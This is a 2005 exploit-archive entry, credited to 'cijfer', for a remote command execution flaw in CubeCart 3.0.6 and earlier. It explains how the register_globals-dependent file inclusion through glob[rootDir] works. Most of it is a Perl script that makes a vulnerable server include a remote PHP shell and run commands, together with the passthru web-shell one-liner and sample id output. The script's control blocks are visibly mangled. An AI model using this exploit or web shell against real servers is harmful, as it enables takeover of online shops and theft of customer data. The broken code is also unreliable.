CubeCart 3.0.6 - Remote Command Execution

Related Vulnerabilities: CVE-2006-0064  
Publish Date: 30 Dec 2005
Author: cijfer
# cijfer-ccxpl - CubeCart <=3.0.6 Remote Command Execution Exploit
# Copyright (c) 2005 cijfer <>
# All rights reserved.           
## 1. example
# [cijfer@kalma:/research]$ perl ./ -h -d
# [ /]$ id;uname -a
# uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
# Linux 2.6.10-1.771_FC2 #1 Mon Mar 28 00:50:14 EST 2005 i686 i686 i386 GNU/Linux
# [ /]$
## 2. explanation
# a serious bug was discovered by me in CubeCart 3.0.6 and below which an attacker
# can remotely execute arbitrary commands via 'includes/' where  
# passing input to the 'glob' and 'cart_order_id' variable, we can attain access to
# passing input to the 'glob[rootDir]' variable, and include a remote execution script
# to execute arbitrary commands. as usual, this requires 'register_globals' to be
# enabled in order to successfully do this, otherwise a 403 error will show.
## 3. the bug
# this below allows us to bypass the 403 error...
#       <?
#       ...
#       if(!isset($glob)){                                              [1]
#       ...
# pass more positive input to $cart_order_id and do you notice what is wrong here?
#       ...
#       if(isset($cart_order_id) && !empty($cart_order_id)){            [2]
#               // build thank you and confirmation email
#               include($glob['rootDir']."/classes/htmlMimeMail.php");  [3] !dangerous!
#               $mail = new htmlMimeMail();
#       ...
## 4. the php shell
# this exploit grabs data via regular expression strings. foreign php shell
# scripts will not work with this exploit. use the following code along with
# this exploit and put it in 'cmd.txt' or whatever you please:
#       <?passthru($_GET[cmd]);?>
## 5. the greets
# kippis to Zodiac, felosi, and odz. also shouts to lethal & hexy
# $Id:,v 0.2 2005/12/30 06:02:00 cijfer Exp cijfer $

use Getopt::Std;
use IO::Socket;
use URI::Escape;


$host = $opt_h;
$dirs = $opt_d;
$shel = "";    # cmd shell url
$cmdv = "cmd";                           # cmd variable (ex. passthru($_GET[cmd]);)
$good = 0;

        print " by cijfer\n";
        print "usage: $0 -h -d /cubecart\r\n";
        print "usage: $0 -h <hostname> -d <directory>\r\n";

        print "[cijfer@".$host." /]\$ ";

        $string  = $dirs;
        $string .= "/includes/";
        $string .= uri_escape($cmdv);
        $string .= "=";
        $string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
        $string .= uri_escape($cmds).";echo";
        $string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
        $string .= "&glob=1&cart_order_id=1&glob[rootDir]=";
        $string .= $shel;
        $string .= "?";

        $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";

        print $sock "GET $string HTTP/1.1\n";
        print $sock "Host: $host\n";
        print $sock "Accept: */*\n";
        print $sock "Connection: close\n\n";

        while($result = <$sock>)
                if($result =~ /^_END_/)

                        print $result;

                if($result =~ /^_START_/)

# [2005-12-30]